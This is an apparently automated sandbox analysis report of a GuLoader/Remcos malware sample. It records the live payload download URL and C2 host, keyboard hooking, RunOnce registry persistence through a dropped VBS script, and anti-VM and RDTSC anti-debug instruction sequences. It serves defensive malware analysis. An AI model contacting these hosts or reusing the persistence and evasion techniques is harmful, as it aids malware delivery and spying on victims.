Source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp |
Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"} |
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe |
Virustotal: Detection: 28% |
Perma Link |
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe |
ReversingLabs: Detection: 13% |
Source: Fec9qUX4at.exe |
Virustotal: Detection: 28% |
Perma Link |
Source: Fec9qUX4at.exe |
ReversingLabs: Detection: 13% |
Source: Yara match |
File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR |
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe |
Joe Sandbox ML: detected |
Source: Fec9qUX4at.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: Malware configuration extractor |
URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin |
Source: unknown |
DNS query: name: wealthyrem.ddns.net |
Source: global traffic |
TCP traffic: 192.168.2.3:49733 -> 194.5.97.128:39200 |
Source: Joe Sandbox View |
ASN Name: DANILENKODE DANILENKODE |
Source: global traffic |
HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: global traffic |
HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache |
Source: unknown |
DNS traffic detected: queries for: wealthyrem.ddns.net |
Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp |
String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Fec9qUX4at.exe |
Jump to behavior |
Source: Fec9qUX4at.exe, 00000000.00000002.338277052.000000000063A000.00000004.00000020.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
|
Source: Yara match |
File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process Stats: CPU usage > 98% |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5586A NtAllocateVirtualMemory, |
0_2_04F5586A |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F505E0 EnumWindows,NtWriteVirtualMemory, |
0_2_04F505E0 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F509C7 NtWriteVirtualMemory, |
0_2_04F509C7 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58F67 NtProtectVirtualMemory, |
0_2_04F58F67 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F542D5 NtWriteVirtualMemory, |
0_2_04F542D5 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F558D5 NtAllocateVirtualMemory, |
0_2_04F558D5 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54693 NtWriteVirtualMemory, |
0_2_04F54693 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54A46 NtWriteVirtualMemory, |
0_2_04F54A46 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54A2D NtWriteVirtualMemory, |
0_2_04F54A2D |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54C15 NtWriteVirtualMemory, |
0_2_04F54C15 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58FBB NtProtectVirtualMemory, |
0_2_04F58FBB |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5475A NtWriteVirtualMemory, |
0_2_04F5475A |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_00401144 |
0_2_00401144 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F584C9 |
0_2_04F584C9 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5209D |
0_2_04F5209D |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F50C76 |
0_2_04F50C76 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F55661 |
0_2_04F55661 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5586A |
0_2_04F5586A |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F505E0 |
0_2_04F505E0 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F509C7 |
0_2_04F509C7 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F59577 |
0_2_04F59577 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F52559 |
0_2_04F52559 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F542D5 |
0_2_04F542D5 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F514D1 |
0_2_04F514D1 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F514D9 |
0_2_04F514D9 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F506D9 |
0_2_04F506D9 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F50CC2 |
0_2_04F50CC2 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F510C2 |
0_2_04F510C2 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F520C2 |
0_2_04F520C2 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F538B9 |
0_2_04F538B9 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F57AA5 |
0_2_04F57AA5 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F57EAD |
0_2_04F57EAD |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F52AAE |
0_2_04F52AAE |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54693 |
0_2_04F54693 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54292 |
0_2_04F54292 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58C9D |
0_2_04F58C9D |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F53051 |
0_2_04F53051 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F55C5C |
0_2_04F55C5C |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54A46 |
0_2_04F54A46 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5864F |
0_2_04F5864F |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F53424 |
0_2_04F53424 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54A2D |
0_2_04F54A2D |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54C15 |
0_2_04F54C15 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F55E11 |
0_2_04F55E11 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5380C |
0_2_04F5380C |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F585F7 |
0_2_04F585F7 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F50BE6 |
0_2_04F50BE6 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F53FDB |
0_2_04F53FDB |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F577CC |
0_2_04F577CC |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F53996 |
0_2_04F53996 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F51D86 |
0_2_04F51D86 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58181 |
0_2_04F58181 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F51D8F |
0_2_04F51D8F |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F52D7C |
0_2_04F52D7C |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F57F61 |
0_2_04F57F61 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58355 |
0_2_04F58355 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58759 |
0_2_04F58759 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5475A |
0_2_04F5475A |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5215A |
0_2_04F5215A |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5293E |
0_2_04F5293E |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F52138 |
0_2_04F52138 |
Source: Fec9qUX4at.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: Fec9qUX4at.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: FANEBREREN.exe.17.dr |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: FANEBREREN.exe.17.dr |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: Fec9qUX4at.exe, 00000000.00000002.338068961.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000000.00000002.338242291.00000000005F0000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenameuser32j% vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp |
Binary or memory string: originalfilename vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000000.336595549.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.490989304.000000001DD60000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp |
Binary or memory string: OriginalFilenamewscript.exe.mui` vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp |
Binary or memory string: OriginalFilenamewscript.exe` vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.491075491.000000001E670000.00000002.00000001.sdmp |
Binary or memory string: System.OriginalFileName vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe |
Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winEXE@5/4@1/2 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File created: C:\Users\user\AppData\Local\Temp\~DFDAA17C5C5846B2AF.TMP |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' |
Source: Fec9qUX4at.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: Fec9qUX4at.exe |
Virustotal: Detection: 28% |
Source: Fec9qUX4at.exe |
ReversingLabs: Detection: 13% |
Source: unknown |
Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe' |
|
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe' |
|
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' |
|
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe' |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 |
Jump to behavior |
Source: Yara match |
File source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, type: MEMORY |
Source: initial sample |
Static PE information: section name: .text entropy: 7.05513425915 |
Source: initial sample |
Static PE information: section name: .text entropy: 7.05513425915 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F50C76 TerminateProcess, |
0_2_04F50C76 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F57394 second address: 0000000004F57394 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx], al 0x0000000c pushad 0x0000000d mov ah, 58h 0x0000000f cmp ah, 00000058h 0x00000012 jne 00007F9040DE846Ch 0x00000018 popad 0x00000019 inc ebx 0x0000001a inc edx 0x0000001b dec ecx 0x0000001c test ecx, ecx 0x0000001e jne 00007F9040DEB55Fh 0x00000020 mov al, byte ptr [edx] 0x00000022 pushad 0x00000023 rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F54701 second address: 0000000004F54701 instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\FANEBREREN.EXE\DYKKERDRAGTSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEAMPHITHYRONS |
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp |
Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F57394 second address: 0000000004F57394 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx], al 0x0000000c pushad 0x0000000d mov ah, 58h 0x0000000f cmp ah, 00000058h 0x00000012 jne 00007F9040DE846Ch 0x00000018 popad 0x00000019 inc ebx 0x0000001a inc edx 0x0000001b dec ecx 0x0000001c test ecx, ecx 0x0000001e jne 00007F9040DEB55Fh 0x00000020 mov al, byte ptr [edx] 0x00000022 pushad 0x00000023 rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F57DB5 second address: 0000000004F57DB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A7105D73h 0x00000007 xor eax, 87E90EABh 0x0000000c xor eax, 91654CB2h 0x00000011 xor eax, B19C1F6Bh 0x00000016 cpuid 0x00000018 test ecx, eax 0x0000001a popad 0x0000001b call 00007F904096867Bh 0x00000020 lfence 0x00000023 mov edx, 2543AA54h 0x00000028 xor edx, 8D843AA0h 0x0000002e xor edx, CC85E3A5h 0x00000034 xor edx, 1BBC7345h 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f test bx, bx 0x00000042 cmp ch, dh 0x00000044 ret 0x00000045 sub edx, esi 0x00000047 ret 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000057 jne 00007F904096865Ch 0x00000059 call 00007F90409686BCh 0x0000005e call 00007F904096869Eh 0x00000063 lfence 0x00000066 mov edx, 2543AA54h 0x0000006b xor edx, 8D843AA0h 0x00000071 xor edx, CC85E3A5h 0x00000077 xor edx, 1BBC7345h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 test bx, bx 0x00000085 cmp ch, dh 0x00000087 ret 0x00000088 mov esi, edx 0x0000008a pushad 0x0000008b rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F57E05 second address: 0000000004F57C28 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, EA4F4DDBh 0x00000013 add eax, E5347E98h 0x00000018 xor eax, 6744AC76h 0x0000001d add eax, 57389FFCh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F9040DEBC91h 0x0000002e cmp ch, ch 0x00000030 pushad 0x00000031 mov eax, 00000094h 0x00000036 rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F57C28 second address: 0000000004F57E05 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 popad 0x00000004 call 00007F9040968846h 0x00000009 lfence 0x0000000c rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F54701 second address: 0000000004F54701 instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
